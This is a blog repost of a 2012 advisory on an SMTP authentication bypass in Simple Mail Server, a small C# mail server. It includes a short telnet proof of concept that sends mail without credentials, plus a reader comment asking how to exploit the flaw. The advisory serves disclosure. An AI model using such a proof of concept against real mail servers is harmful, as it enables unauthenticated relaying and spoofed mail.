Simple Mail Server - SMTP Authentication Bypass Vulnerability | Learn Cyber Security

» » Simple Mail Server - SMTP Authentication Bypass Vulnerability

Simple Mail Server - SMTP Authentication Bypass Vulnerability

2:30 PM Posted by Adnan

Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability


Software : Simple Mail Server


Software Version : 2011-12-30


Vendor: http://simplemailsvr.sourceforge.net/


Class:  Origin Validation Error  


CVE:

Remote:  Yes  


Local:  No  


Published:  2012-01-08


Updated: 


CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)


Impact : Medium (4 < 6.4 < 8)


Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp 
client(such as telnet).
And it did not have SMTP authentication contoller.


POC(Remarks: domain alex.com and user alex () alex com must be exists in configuration for this test case):
telnet 127.0.0.1 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
MAIL FROM:
250 OK
RCPT TO:
250 OK
Data
354 Start mail input; end with .
From: "alex () alex com"
To: "alex () alex com"
Subject: authenticate is not required!


Tags:


author

This post was written by:

Adnan Anjum - who has written 1000+ posts on hackguide4u.

Adnan Anjum is a professional Geek. Follow him on Twitter or email him

Share your views...

1 Respones to "Simple Mail Server - SMTP Authentication Bypass Vulnerability"

dog said...

How to take advantage of it?


January 10, 2012 at 11:59 PM

Post a Comment

Subscribe to: Post Comments (Atom)
 

© 2011 Learn Cyber Security All Rights Reserved Learn Hacking Online hackguide4u.com